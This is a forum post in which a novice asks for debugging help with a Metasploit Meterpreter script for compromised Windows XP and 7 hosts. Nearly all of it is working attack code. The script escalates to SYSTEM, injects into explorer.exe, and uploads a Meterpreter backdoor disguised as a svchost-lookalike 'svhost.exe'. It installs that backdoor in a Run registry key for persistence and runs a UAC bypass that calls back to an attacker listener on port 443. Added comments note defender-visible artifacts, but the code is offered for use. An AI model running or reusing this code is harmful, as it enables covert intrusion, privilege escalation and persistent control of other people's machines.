Thread: Metasploit Script


    Default Metasploit Script to get System Privileges XP / 7

    Hello,

    I'm trying to automate a script to bypass UAC in Windows 7, but my problem for now is that my script starts but won't continue after the output "Session XX?!?..start", and I don't know why, because I don't know where the log files are. Sorry, I am very new to Metasploit and Ruby. Furthermore, Google gives me no results...


    EDIT:

    I will post my full script in the hope of getting help.


    Code:
    # Keep a handle on the session client so the helper methods below can reach it.
    @client = client
    
    
    # Read one registry value from the target through the registry helper.
    # key   - registry key path (check_sys passes a ...\Run key)
    # value - name of the value to read
    # Returns whatever registry_getvaldata yields; check_sys matches it against /svhost/.
    def read_reg(key, value)
    	print_status "Reading Register-Key..."
    	v = registry_getvaldata(key,value)
    	return v
    end
    
    # Write `exec` as a REG_SZ string into key\value on the target.
    # Errors are printed and swallowed, so the caller cannot tell whether the
    # write succeeded. `rescue ::Exception` is broader than StandardError: it also
    # catches interrupts and SystemExit.
    # Defender note: as called from check_sys the key is a ...\Run autostart key;
    # registry write auditing on those keys records this persistence artifact.
    def write_reg(key, value, exec)
    	print_status "Writing Register-Key..."
    	begin
    		registry_setvaldata(key,value,exec,"REG_SZ")
    	rescue::Exception => e
    	print_status("The following Error was encountered: #{e.class} #{e}")
    	end
    end
    
    # Copy a local file into the target's %TEMP% directory under a randomised
    # svhost<N>.exe name and return that remote path.
    # file - local path; raises a RuntimeError if it does not exist locally.
    # Upload failures are printed and then re-raised.
    # (`File.exists?` is a deprecated alias of `File.exist?`.)
    # Defender note: an executable named svhost<digits>.exe in %TEMP% is the
    # on-disk artifact this leaves; the name resembles, but is not, svchost.exe.
    def upload(file)
    	tmpdrv = @client.fs.file.expand_path("%TEMP%")
    	if not ::File.exists?(file)
    		raise "File to Upload does not exists!"
    	else
    		begin
    			# rand(100) gives a 0..99 suffix, so the name is not unique across runs
    			fileontrgt = "#{tmpdrv}\\svhost#{rand(100)}.exe"
    			print_status("\tUploading #{file}....")
    
    			@client.fs.file.upload_file("#{fileontrgt}","#{file}")
    			print_status("\t#{file} uploaded!")
    			print_status("\tUploaded as #{fileontrgt}")
    		rescue ::Exception => e
    			print_status("Error uploading file #{file}: #{e.class} #{e}")
    			raise e
    		end
    	end
    	return fileontrgt
    end
    
    
    # Try to elevate the current session to SYSTEM via session.priv.getsystem.
    # Returns the Integer 1 on success and 0 on failure (not booleans; check_sys
    # compares the result with 1).
    # results[0] is used as the success flag — presumably the first element of
    # getsystem's return value; confirm against the Meterpreter API in use.
    def get_system()
    	print_status("Trying to get SYSTEM privilege")
    	results = session.priv.getsystem
    	if results[0]
    		print_status("Got SYSTEM privilege")
    		return 1
    	else
    		print_error("Could not obtain SYSTEM privileges")
    		return 0
    	end
    end
    
    
    # Migrate the session into a running process whose lower-cased name is a
    # substring of `proc` (e.g. "explorer.exe"), skipping the session's own pid.
    # The each loop does not stop after a successful migration, so every matching
    # process is attempted in turn. Any StandardError is swallowed by the bare
    # rescue and reported as one status line.
    # Defender note: process migration into explorer.exe is a visible
    # cross-process injection event for endpoint telemetry.
    def migrate_to_proc(proc)
    	begin
    		# "explorer.exe"
    		process2mig = proc 
    
    		# Actual migration
    		mypid = session.sys.process.getpid
    		session.sys.process.get_processes().each do |x|
    			# String#index returns a position (truthy) when the name occurs in proc
    			if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
    				print_status("#{process2mig} Process found, migrating into #{x['pid']}")
    				session.core.migrate(x['pid'].to_i)
    				print_status("Migration Successful!!")
    			end
    		end
    	rescue
    		print_status("Failed to migrate process!")
    		#next
    	end
    end
    
    
    # Main decision routine; branches on the OS string reported by sysinfo.
    #  * XP: migrate into explorer.exe; if the uid is not SYSTEM, call get_system
    #    and pick the HKLM Run key on success or the HKCU Run key on failure; if
    #    the "nc" value there does not already reference an svhost binary, upload
    #    /root/BACKDOOR/meterpreter.exe and register it (autostart persistence).
    #  * Windows 7: migrate into explorer.exe; if the uid is not SYSTEM, build a
    #    fresh Msf::Simple::Framework, load the windows/escalate/bypassuac post
    #    module and run it through exploit_simple against this session's sid,
    #    then report whether a second session came back.
    #  * anything else: print "Unknow OS System" and return.
    # Defender note: the observable artifacts are a migration into explorer.exe,
    # an svhost*.exe dropped in %TEMP%, and a Run-key value named "nc" pointing
    # at it.
    def check_sys()
    
    	key = ""
    	print_status "OS: #{@client.sys.config.sysinfo["OS"]}"
    
    	if (@client.sys.config.sysinfo["OS"].downcase =~ /xp/)
    		migrate_to_proc("explorer.exe")
    		# getuid string does not contain "SYSTEM"
    		if (@client.sys.config.getuid !~ /SYSTEM/)
    			print_status "Got only #{@client.sys.config.getuid} Privs..."
    			res =get_system()
    			# user-level Run key when elevation failed, machine-level when it worked
    			if (res != 1)
    				key = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
    			else
    				key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
    			end
    
    			#if get change key
    			#key = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'
    			value = "nc"
    			found = read_reg(key, value)
    			# an existing value mentioning svhost is taken as "already installed"
    			if (found =~ /svhost/)
    				print_status "Register-Key are already stored"
    			else
    				print_status "Setting up Backdoor..."
    				file = "/root/BACKDOOR/meterpreter.exe"
    				exec = upload(file)
    				write_reg(key, value, exec)
    			end	
    
    		else
    			print_status "[BINGO] Got #{@client.sys.config.getuid} Privs..."
    		end
    	elsif (@client.sys.config.sysinfo["OS"].downcase =~ /windows 7/)
    		print_status "Trying to exploit win 7"
    		migrate_to_proc("explorer.exe")
    		if (@client.sys.config.getuid !~ /SYSTEM/)
    			print_status "Trying to Get System Privs..."
    			post_mod = "windows/escalate/bypassuac"
    			framework = Msf::Simple::Framework.create
    			driver = Msf::ExploitDriver.new(framework)
    			driver.exploit = framework.post.create(post_mod)
    
    			#s = datastore['SESSION']
    			print_status("Session #{session.sid}?!?..start")
    			# Fire it off.
    			@input = Rex::Ui::Text::Input::Stdio.new
    			@output = Rex::Ui::Text::Output::File.new(@default_file)
    
    			# LHOST is left as a placeholder ("xxxxxxxxx") in the posted script; LPORT is 443
    			session2 = driver.exploit.exploit_simple(
    				'Options' 	=> {"LHOST" => "xxxxxxxxx", "LPORT" => "443", "SESSION" => "#{session.sid}" },
    				'LocalInput' 	=> @input,
    				'LocalOutput' 	=> @output)
    
    			print_status("ok")
    			# If a session came back, try to interact with it.
    			if (session2)
    				print_status("Session #{session2.sid} created, interacting...")
    		
    			else
    				print_line("Exploit completed, no session was created.")
    			end
    
    			
    		end
    			
    	else
    		print_status "Unknow OS System"
    	end
    
    end
    
    
    
    # Main: announce start, run the OS-specific routine, announce completion.
    print_status("Running Startup script....")
    check_sys() 
    print_status("Done")

    I hope for help, and please excuse my English.
